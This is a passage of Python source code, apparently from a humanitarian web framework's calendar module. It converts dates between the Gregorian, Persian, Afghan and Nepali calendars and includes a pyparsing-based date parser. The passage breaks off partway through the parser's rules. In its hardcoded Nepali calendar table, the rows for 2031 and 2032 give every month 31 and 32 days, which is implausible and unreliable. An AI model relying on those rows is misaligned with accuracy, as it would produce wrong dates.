dtfmt = current.deployment_settings.get_L10n_datetime_format()
else:
dtfmt = ISOFORMAT # ISO Date/Time Format
# Use the current calendar
calendar = self.calendar
# Parse the dtstr
try:
timetuple = calendar._parse(dtstr, dtfmt)
except (ValueError, TypeError):
return None
# Convert timetuple to Gregorian calendar
timetuple = calendar._gdate(timetuple)
# Convert into datetime
dt = datetime.datetime(*timetuple)
return dt
# -------------------------------------------------------------------------
def format_date(self, dt, dtfmt=None, local=False):
"""
Format a date according to this calendar
Args:
dt: the date (datetime.date or datetime.datetime)
Returns:
the date as string
"""
if dt is None:
return current.messages["NONE"]
# Default format
if dtfmt is None:
if local:
dtfmt = current.deployment_settings.get_L10n_date_format()
else:
dtfmt = "%Y-%m-%d" # ISO Date Format
# Deal with T's
from .convert import s3_str
dtfmt = s3_str(dtfmt)
return self.calendar._format(dt, dtfmt)
# -------------------------------------------------------------------------
def format_datetime(self, dt, dtfmt=None, local=False):
"""
Format a datetime according to this calendar
Args:
dt: the datetime (datetime.datetime)
Returns:
the datetime as string
"""
if dt is None:
return current.messages["NONE"]
# Default format
if dtfmt is None:
if local:
dtfmt = current.deployment_settings.get_L10n_datetime_format()
else:
dtfmt = ISOFORMAT # ISO Date/Time Format
# Deal with T's
from .convert import s3_str
dtfmt = s3_str(dtfmt)
# Remove microseconds
# - for the case that the calendar falls back to .isoformat
if isinstance(dt, datetime.datetime):
dt = dt.replace(microsecond=0)
return self.calendar._format(dt, dtfmt)
# -------------------------------------------------------------------------
# Base class methods (must not be implemented by subclasses):
# -------------------------------------------------------------------------
def __init__(self, name=None):
"""
Args:
name: the name of the calendar (see _set_calendar for
supported calendars). If constructed without name,
the L10.calendar deployment setting will be used
instead.
"""
# Supported calendars
self._calendars = {"Gregorian": S3Calendar,
"Persian": S3PersianCalendar,
"Afghan": S3AfghanCalendar,
"Nepali": S3NepaliCalendar,
}
if name is None:
self._name = None
self._calendar = None
elif name == self.CALENDAR:
self._name = name
self._calendar = self
else:
self._set_calendar(name)
self._parser = None
self._first_dow = None
# -------------------------------------------------------------------------
def _set_calendar(self, name=None):
"""
Set the current calendar
Args:
name: the name of the calendar (falls back to CALENDAR)
"""
calendars = self._calendars
# Fallback
if name not in calendars:
name = self.CALENDAR
# Instantiate the Calendar
if name == self.CALENDAR:
calendar = self
else:
calendar = calendars[name](name)
self._name = name
self._calendar = calendar
return calendar
# -------------------------------------------------------------------------
def _get_parser(self, dtfmt):
# Gregorian calendar does not use a parser
if self.name == "Gregorian":
return None
# Configure the parser
parser = self._parser
if parser is None:
parser = S3DateTimeParser(self, dtfmt)
else:
parser.set_format(dtfmt)
self._parser = parser
return parser
# -------------------------------------------------------------------------
def _parse(self, dtstr, dtfmt):
# Get the parser
parser = self._get_parser(dtfmt)
if not parser:
# Gregorian calendar - use strptime
try:
timetuple = time.strptime(dtstr, dtfmt)
except ValueError as e:
# Seconds missing?
try:
timetuple = time.strptime(dtstr + ":00", dtfmt)
except ValueError:
raise e
return timetuple[:6]
# Use calendar-specific parser
return parser.parse(dtstr)
# -------------------------------------------------------------------------
def _format(self, dt, dtfmt):
"""
Get a string representation for a datetime.datetime according
to this calendar and dtfmt, to be implemented by subclass
Args:
dt: the datetime.datetime
dtfmt: the datetime format (strftime)
Returns:
the string representation (str)
Raises:
TypeError: for invalid argument types
"""
if self.name == "Gregorian":
# Gregorian Calendar uses strftime
fmt = str(dtfmt)
try:
dtstr = dt.strftime(fmt)
except ValueError:
# Dates < 1900 not supported by strftime
year = "%04i" % dt.year
fmt = fmt.replace("%Y", year).replace("%y", year[-2:])
dtstr = dt.replace(year=1900).strftime(fmt)
except AttributeError:
# Invalid argument type
raise TypeError("Invalid argument type: %s" % type(dt))
else:
if not isinstance(dt, datetime.datetime):
try:
timetuple = (dt.year, dt.month, dt.day, 0, 0, 0)
except AttributeError:
# Invalid argument type
raise TypeError("Invalid argument type: %s" % type(dt))
else:
timetuple = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
)
formatter = S3DateTimeFormatter(self)
dtstr = formatter.render(self._cdate(timetuple), dtfmt)
return dtstr
# -------------------------------------------------------------------------
def _cdate(self, timetuple):
"""
Convert a time tuple from Gregorian calendar to this calendar
Args:
timetuple: time tuple (y, m, d, hh, mm, ss)
Returns:
time tuple (this calendar)
"""
if self.name == "Gregorian":
# Gregorian Calendar does nothing here
return timetuple
y, m, d, hh, mm, ss = timetuple
jd = self._gregorian_to_jd(y, m, d)
y, m, d = self.from_jd(jd)
return (y, m, d, hh, mm, ss)
# -------------------------------------------------------------------------
def _gdate(self, timetuple):
"""
Convert a time tuple from this calendar to Gregorian calendar
Args:
timetuple: time tuple (y, m, d, hh, mm, ss)
Returns:
time tuple (Gregorian)
"""
if self.name == "Gregorian":
# Gregorian Calendar does nothing here
return timetuple
y, m, d, hh, mm, ss = timetuple
jd = self.to_jd(y, m, d)
y, m, d = self._jd_to_gregorian(jd)
return (y, m, d, hh, mm, ss)
# -------------------------------------------------------------------------
@staticmethod
def _gregorian_to_jd(year, month, day):
"""
Convert a Gregorian date into a Julian day number (matching
jQuery calendars algorithm)
Args:
year: the year number
month: the month number
day: the day number
"""
if year < 0:
year = year + 1
if month < 3:
month = month + 12
year = year - 1
a = math.floor(year/100)
b = 2 - a + math.floor(a / 4)
return math.floor(365.25 * (year + 4716)) + \
math.floor(30.6001 * (month + 1)) + day + b - 1524.5
# -------------------------------------------------------------------------
@staticmethod
def _jd_to_gregorian(jd):
"""
Convert a Julian day number to a Gregorian date (matching
jQuery calendars algorithm)
Args:
jd: the Julian day number
Returns:
tuple (year, month, day)
"""
z = math.floor(jd + 0.5)
a = math.floor((z - 1867216.25) / 36524.25)
a = z + 1 + a - math.floor(a / 4)
b = a + 1524
c = math.floor((b - 122.1) / 365.25)
d = math.floor(365.25 * c)
e = math.floor((b - d) / 30.6001)
day = b - d - math.floor(e * 30.6001)
if e > 13.5:
month = e - 13
else:
month = e - 1
if month > 2.5:
year = c - 4716
else:
year = c - 4715
if year <= 0:
year = year - 1
return (int(year), int(month), int(day))
# =============================================================================
class S3PersianCalendar(S3Calendar):
"""
S3Calendar subclass implementing the Solar Hijri calendar
NB this calendar is called "Persian" in jQuery calendars despite
it actually implements the modern Iranian (=algorithmic Solar
Hijri) rather than the traditional Persian (=observation-based
Jalali) variant. However, we use the name "Persian" to match
the jQuery calendars naming of calendars, in order to avoid
confusion about naming differences between these two components.
"""
CALENDAR = "Persian"
JDEPOCH = 1948320.5 # first day of this calendar as Julian Day number
MONTH_NAME = ("Farvardin", "Ordibehesht", "Khordad",
"Tir", "Mordad", "Shahrivar",
"Mehr", "Aban", "Azar",
"Day", "Bahman", "Esfand",
)
MONTH_ABBR = ("Far", "Ord", "Kho", "Tir", "Mor", "Sha",
"Meh", "Aba", "Aza", "Day", "Bah", "Esf",
)
MONTH_DAYS = (31, 31, 31, 31, 31, 31, 30, 30, 30, 30, 30, (29, 30))
FIRST_DOW = 6 # Shambe
# -------------------------------------------------------------------------
# Methods to be implemented by subclasses
# -------------------------------------------------------------------------
@classmethod
def from_jd(cls, jd):
"""
Convert a Julian day number to a year/month/day tuple
of this calendar (matching jQuery calendars algorithm)
Args:
jd: the Julian day number
"""
jd = math.floor(jd) + 0.5
depoch = jd - cls.to_jd(475, 1, 1)
cycle = math.floor(depoch / 1029983)
cyear = depoch % 1029983
if cyear != 1029982:
aux1 = math.floor(cyear / 366)
aux2 = cyear % 366
ycycle = math.floor(((2134 * aux1) + (2816 * aux2) + 2815) / 1028522) + aux1 + 1
else:
ycycle = 2820
year = ycycle + (2820 * cycle) + 474
if year <= 0:
year -= 1
yday = jd - cls.to_jd(year, 1, 1) + 1
if yday <= 186:
month = math.ceil(yday / 31)
else:
month = math.ceil((yday - 6) / 30)
day = jd - cls.to_jd(year, month, 1) + 1
return (int(year), int(month), int(day))
# -------------------------------------------------------------------------
@classmethod
def to_jd(cls, year, month, day):
"""
Convert a year/month/day tuple of this calendar into
a Julian day number (matching jQuery calendars algorithm)
Args:
year: the year number
month: the month number
day: the day-of-month number
"""
if year >= 0:
ep_base = year - 474
else:
ep_base = year - 473
ep_year = 474 + (ep_base % 2820)
if month <= 7:
mm = (month - 1) * 31
else:
mm = (month - 1) * 30 + 6
result = day + mm + math.floor((ep_year * 682 - 110) / 2816) + \
(ep_year - 1) * 365 + math.floor(ep_base / 2820) * 1029983 + \
cls.JDEPOCH - 1
return result
# =============================================================================
class S3AfghanCalendar(S3PersianCalendar):
"""
Afghan variant of the Solar Hijri calendar - this calendar uses
the same calendar rules as the "Persian" calendar, but with
different month names.
Note:
This is using "romanized" Dari month names as translation
basis (rather than their actual English translation, which
would simply be the names of the signs of Zodiac the sun is
passing through in the respective months, e.g. Tawr (Sawr) = Taurus).
Transcriptions vary widely between sources, though - as do
the Dari and Pashto spellings :/
"""
CALENDAR = "Afghan"
MONTH_NAME = ("Hamal", "Sawr", "Jawza",
"Saratan", "Asad", "Sonbola",
"Mizan", "Aqrab", "Qaws",
"Jadi", "Dalw", "Hut",
)
MONTH_ABBR = ("Ham", "Saw", "Jaw", "Sar", "Asa", "Son",
"Miz", "Aqr", "Qaw", "Jad", "Dal", "Hut",
)
FIRST_DOW = 6 # Shambe
# =============================================================================
class S3NepaliCalendar(S3Calendar):
"""
S3Calendar subclass implementing the Nepali calendar (Bikram Samvat)
"""
# -------------------------------------------------------------------------
# Constants to be implemented by subclasses
# -------------------------------------------------------------------------
CALENDAR = "Nepali"
JDEPOCH = 1700709.5 # first day of this calendar as Julian Day number
MONTH_NAME = ("Baisakh", "Jestha", "Ashadh",
"Shrawan", "Bhadra", "Ashwin",
"Kartik", "Mangsir", "Paush",
"Mangh", "Falgun", "Chaitra",
)
MONTH_ABBR = ("Bai", "Je", "As",
"Shra", "Bha", "Ash",
"Kar", "Mang", "Pau",
"Ma", "Fal", "Chai",
)
MONTH_DAYS = ((30, 31), (31, 32), (31, 32),
(31, 32), (31, 32), (30, 31),
(29, 30), (29, 30), (29, 30),
(29, 30), (29, 30), (30, 31))
FIRST_DOW = 1 # Sombaar (=Monday)
# There is no algorithm to predict the days in the individual months
# of the Bikram Samvat calendar for a particular year, so we have to
# hardcode this information as a mapping dict (taken from jquery.calendars
# in order to match the front-end widget's calculations).
# Outside of the year range of this dict (years A.B.S.), we have to
# fall back to an approximation formula which may though give a day
# ahead or behind the actual date
NEPALI_CALENDAR_DATA = {
# These data are from http://www.ashesh.com.np
1970: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1971: [18, 31, 31, 32, 31, 32, 30, 30, 29, 30, 29, 30, 30],
1972: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
1973: [19, 30, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
1974: [19, 31, 31, 32, 30, 31, 31, 30, 29, 30, 29, 30, 30],
1975: [18, 31, 31, 32, 32, 30, 31, 30, 29, 30, 29, 30, 30],
1976: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
1977: [18, 31, 32, 31, 32, 31, 31, 29, 30, 29, 30, 29, 31],
1978: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1979: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
1980: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
1981: [18, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
1982: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1983: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
1984: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
1985: [18, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
1986: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1987: [18, 31, 32, 31, 32, 31, 30, 30, 29, 30, 29, 30, 30],
1988: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
1989: [18, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
1990: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1991: [18, 31, 32, 31, 32, 31, 30, 30, 29, 30, 29, 30, 30],
# These data are from http://nepalicalendar.rat32.com/index.php
1992: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
1993: [18, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
1994: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1995: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
1996: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
1997: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1998: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
1999: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2000: [17, 30, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2001: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2002: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2003: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2004: [17, 30, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2005: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2006: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2007: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2008: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 29, 31],
2009: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2010: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2011: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2012: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
2013: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2014: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2015: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2016: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
2017: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2018: [18, 31, 32, 31, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2019: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2020: [17, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
2021: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2022: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
2023: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2024: [17, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
2025: [18, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2026: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2027: [17, 30, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2028: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2029: [18, 31, 31, 32, 31, 32, 30, 30, 29, 30, 29, 30, 30],
2030: [17, 31, 32, 31, 32, 31, 30, 30, 30, 30, 30, 30, 31],
2031: [17, 31, 32, 31, 32, 31, 31, 31, 31, 31, 31, 31, 31],
2032: [17, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32],
2033: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2034: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2035: [17, 30, 32, 31, 32, 31, 31, 29, 30, 30, 29, 29, 31],
2036: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2037: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2038: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2039: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
2040: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2041: [18, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2042: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2043: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
2044: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2045: [18, 31, 32, 31, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2046: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2047: [17, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
2048: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2049: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
2050: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2051: [17, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
2052: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2053: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
2054: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2055: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 30, 29, 30],
2056: [17, 31, 31, 32, 31, 32, 30, 30, 29, 30, 29, 30, 30],
2057: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2058: [17, 30, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2059: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2060: [17, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2061: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2062: [17, 30, 32, 31, 32, 31, 31, 29, 30, 29, 30, 29, 31],
2063: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2064: [17, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2065: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2066: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 29, 31],
2067: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2068: [17, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2069: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2070: [17, 31, 31, 31, 32, 31, 31, 29, 30, 30, 29, 30, 30],
2071: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2072: [17, 31, 32, 31, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2073: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 31],
2074: [17, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
2075: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2076: [16, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
2077: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 29, 31],
2078: [17, 31, 31, 31, 32, 31, 31, 30, 29, 30, 29, 30, 30],
2079: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 29, 30, 30],
2080: [16, 31, 32, 31, 32, 31, 30, 30, 30, 29, 29, 30, 30],
# These data are from http://www.ashesh.com.np/nepali-calendar/
2081: [17, 31, 31, 32, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2082: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2083: [17, 31, 31, 32, 31, 31, 30, 30, 30, 29, 30, 30, 30],
2084: [17, 31, 31, 32, 31, 31, 30, 30, 30, 29, 30, 30, 30],
2085: [17, 31, 32, 31, 32, 31, 31, 30, 30, 29, 30, 30, 30],
2086: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2087: [16, 31, 31, 32, 31, 31, 31, 30, 30, 29, 30, 30, 30],
2088: [16, 30, 31, 32, 32, 30, 31, 30, 30, 29, 30, 30, 30],
2089: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2090: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2091: [16, 31, 31, 32, 31, 31, 31, 30, 30, 29, 30, 30, 30],
2092: [16, 31, 31, 32, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2093: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2094: [17, 31, 31, 32, 31, 31, 30, 30, 30, 29, 30, 30, 30],
2095: [17, 31, 31, 32, 31, 31, 31, 30, 29, 30, 30, 30, 30],
2096: [17, 30, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30],
2097: [17, 31, 32, 31, 32, 31, 30, 30, 30, 29, 30, 30, 30],
2098: [17, 31, 31, 32, 31, 31, 31, 29, 30, 29, 30, 30, 31],
2099: [17, 31, 31, 32, 31, 31, 31, 30, 29, 29, 30, 30, 30],
2100: [17, 31, 32, 31, 32, 30, 31, 30, 29, 30, 29, 30, 30],
}
# -------------------------------------------------------------------------
# Methods to be implemented by subclasses
# -------------------------------------------------------------------------
@classmethod
def from_jd(cls, jd):
"""
Convert a Julian day number to a year/month/day tuple
of this calendar (matching jQuery calendars algorithm)
Args:
jd: the Julian day number
"""
gyear = cls._jd_to_gregorian(jd)[0]
gdoy = jd - cls._gregorian_to_jd(gyear, 1, 1) + 1
year = gyear + 56
cdata = cls._get_calendar_data(year)
month = 9
rdays = cdata[month] - cdata[0] + 1
while gdoy > rdays:
month += 1
if month > 12:
month = 1
year += 1
cdata = cls._get_calendar_data(year)
rdays += cdata[month]
day = cdata[month] - (rdays - gdoy)
return (int(year), int(month), int(day))
# -------------------------------------------------------------------------
@classmethod
def to_jd(cls, year, month, day):
"""
Convert a year/month/day tuple of this calendar into
a Julian day number (matching jQuery calendars algorithm)
Args:
year: the year number
month: the month number
day: the day-of-month number
"""
cmonth = month
cyear = year
# Get the Gregorian year
if cmonth > 9 or cmonth == 9 and day > cls._get_calendar_data(cyear)[0]:
gyear = year - 56
else:
gyear = year - 57
# Calculate days since January 1st in Gregorian year
gdoy = 0
if month != 9:
gdoy = day
cmonth -= 1
cdata = cls._get_calendar_data(cyear)
while cmonth != 9:
if cmonth <= 0:
cmonth = 12
cyear -= 1
cdata = cls._get_calendar_data(cyear)
gdoy += cdata[cmonth]
cmonth -= 1
if month == 9:
gdoy += day - cdata[0]
if gdoy <= 0:
gyear_ = gyear + (1 if gyear < 0 else 0)
gleapyear = gyear_ % 4 == 0 and \
(gyear_ % 100 != 0 or gyear_ % 400 == 0)
gdoy += 366 if gleapyear else 365
else:
gdoy += cdata[9] - cdata[0]
# Convert January 1st of the Gregorian year to JD and
# add the days that went since then
return cls._gregorian_to_jd(gyear, 1, 1) + gdoy
# -------------------------------------------------------------------------
@classmethod
def _get_calendar_data(cls, year):
"""
Helper method to determine the days in the individual months
of the BS calendar, as well as the start of the year
"""
default = [17, 31, 31, 32, 32, 31, 30, 30, 29, 30, 29, 30, 30]
return cls.NEPALI_CALENDAR_DATA.get(year, default)
# =============================================================================
class S3DateTimeParser:
""" Date/Time Parser for non-Gregorian calendars """
def __init__(self, calendar, dtfmt=None):
"""
Args:
calendar: the calendar
dtfmt: the date/time format
"""
# Get the effective calendar
if not calendar:
raise TypeError("Invalid calendar: %s (%s)" % (calendar, type(calendar)))
self.calendar = calendar.calendar
self.grammar = None
self.rules = None
self.set_format(dtfmt)
# -------------------------------------------------------------------------
def parse(self, string):
"""
Parse a date/time string
Args:
string: the date/time string
Returns:
a timetuple (y, m, d, hh, mm, ss)
"""
if not isinstance(string, str):
raise TypeError("Invalid argument type: expected str, got %s" % type(string))
try:
result = self.grammar.parseString(string)
except self.ParseException:
raise ValueError("Invalid date/time: %s" % string)
return self._validate(result)
# -------------------------------------------------------------------------
def set_format(self, dtfmt):
"""
Update the date/time format for this parser, and generate
the corresponding pyparsing grammar
Args:
dtfmt: the date/time format
"""
if not isinstance(dtfmt, str):
raise TypeError("Invalid date/time format: %s (%s)" % (dtfmt, type(dtfmt)))
import pyparsing as pp
self.ParseException = pp.ParseException
# Get the rules
rules = self.rules
if rules is None:
rules = self.rules = self._get_rules()
# Interpret the format
result = []
sequence = []
def close(s):
s = "".join(s).strip()
if s:
result.append(pp.Suppress(pp.Literal(s)))
from .convert import s3_str
rule = False
for c in s3_str(dtfmt):
if rule and c in rules:
# Close previous sequence
sequence.pop()
close(sequence)
# Append control rule
result.append(rules[c])
# Start new sequence
sequence = []
# Close rule
rule = False
continue
if c == "%" and not rule:
rule = True
else:
rule = False
sequence.append(c)
if sequence:
close(sequence)
if result:
grammar = result[0]
for item in result[1:]:
grammar += item
else:
# Default = ignore everything
grammar = pp.Suppress(pp.Regex(".*"))
self.grammar = grammar
return grammar
# -------------------------------------------------------------------------
def _validate(self, parse_result):
"""
Validate the parse result and convert it into a time tuple
Args:
parse_result: the parse result
Returns:
a timetuple (y, m, d, hh, mm, ss)
"""
calendar = self.calendar
# Get the current date
now = current.request.utcnow
today = (now.year, now.month, now.day, 0, 0, 0)
# Convert today into current calendar
cyear, cmonth = calendar._cdate(today)[:2]
# Year
year = parse_result.get("year4")
if year is None:
year = parse_result.get("year2")
if year is None:
# Fall back to current year of the calendar
year = cyear
else:
# Two-digit year: add century
century = cyear // 100 * 100
year += century
# If that year is more than 30 years in the future,
# we assume that actually the previous century is meant
if year - cyear > 30:
year -= 100
# Month
month = parse_result.get("month") or cmonth
# Day of Month
day = parse_result.get("day") or 1
# Correct the date by converting to JD and back
year, month, day = calendar.from_jd(calendar.to_jd(year, month, day))
# Hours
hour = parse_result.get("hour24")
if hour is None:
# 12 hours?
hour = parse_result.get("hour12")
if hour is None:
hour = 0
else:
# Do we have am or pm?
if hour == 12:
hour = 0
if parse_result.get("ampm", "AM") == "PM":
hour += 12
# Minute
minute = parse_result.get("minute") or 0
# Second
second = parse_result.get("second") or 0
return (year, month, day, hour, minute, second)
# -------------------------------------------------------------------------
@staticmethod
def _parse_int(s, l, tokens):
""" Parser helper to convert a token into an integer number """
try:
return int(tokens[0])
except (TypeError, ValueError):
return None
# -------------------------------------------------------------------------
def _get_rules(self):
"""
Generate the general pyparsing rules for this calendar
Returns:
the rules dict
rules = {"d": Day of the month as a zero-padded decimal number
"b": Month as locale’s abbreviated name
"B": Month as locale’s full name
"m": Month as a zero-padded decimal number
"y": Year without century as a zero-padded decimal number
"Y": Year with century as a decimal number
"H": Hour (24-hour clock) as a zero-padded decimal number
"I": Hour (12-hour clock) as a zero-padded decimal number
"p": Locale’s equivalent of either AM or PM
"M": Minute as a zero-padded decimal number
"S": Second as a zero-padded decimal number
}
TODO support day-of-week options (recognize but suppress when parsing)
"""
import pyparsing as pp
T = current.T
calendar = self.calendar
oneOf = pp.oneOf
parse_int = self._parse_int
def numeric(minimum, maximum):
""" Helper to define rules for zero-padded numeric values """
zp = " ".join("%02d" % i \
for i in range(minimum, min(10, maximum + 1)))
np = " ".join("%d" % i \
for i in range(minimum, maximum + 1))
return (oneOf(zp) ^ oneOf(np)).setParseAction(parse_int)
# Day
month_days = calendar.MONTH_DAYS
days = [(max(d) if isinstance(d, tuple) else d) for d in month_days]
day = numeric(1, max(days)).setResultsName("day")
# Month
CaselessLiteral = pp.CaselessLiteral
replaceWith = pp.replaceWith
# ...numeric
num_months = len(calendar.MONTH_NAME)
month = numeric(1, num_months).setResultsName("month")
# ...name
expr = None
for i, m in enumerate(calendar.MONTH_NAME):
month_number = str(i+1)
month_literal = CaselessLiteral(m)
month_t = str(T(m))
if month_t != m:
month_literal |= CaselessLiteral(month_t)
month_literal.setParseAction(replaceWith(month_number))
expr = (expr | month_literal) if expr else month_literal
month_name = expr.setParseAction(parse_int).setResultsName("month")
# ...abbreviation
expr = None
for i, m in enumerate(calendar.MONTH_ABBR):
month_number = str(i+1)
month_literal = CaselessLiteral(m)
month_t = str(T(m))
if month_t != m:
month_literal |= CaselessLiteral(month_t)
month_literal.setParseAction(replaceWith(month_number))
expr = (expr | month_literal) if expr else month_literal
month_abbr = expr.setParseAction(parse_int).setResultsName("month")
# Year
Word = pp.Word
nums = pp.nums
# ...without century
year2 = Word(nums, min=1, max=2)
year2 = year2.setParseAction(parse_int).setResultsName("year2")
# ...with century
year4 = Word(nums, min=1, max=4)
year4 = year4.setParseAction(parse_int).setResultsName("year4")
# Hour
hour24 = numeric(0, 23).setResultsName("hour24")
hour12 = numeric(0, 12).setResultsName("hour12")
# Minute
minute = numeric(0, 59).setResultsName("minute")
# Second
second = numeric(0, 59).setResultsName("second")
# AM/PM
am = ("AM", str(T("AM")), "am", str(T("am")))
am = oneOf(" ".join(am)).setParseAction(pp.replaceWith("AM"))
pm = ("PM", str(T("PM")), "pm", str(T("pm")))
pm = oneOf(" ".join(pm)).setParseAction(pp.replaceWith("PM"))
ampm = (am ^ pm).setResultsName("ampm")
rules = {"d": day,
"b": month_abbr,
"B": month_name,
"m": month,
"y": year2,
"Y": year4,
"H": hour24,
"I": hour12,
"p": ampm,
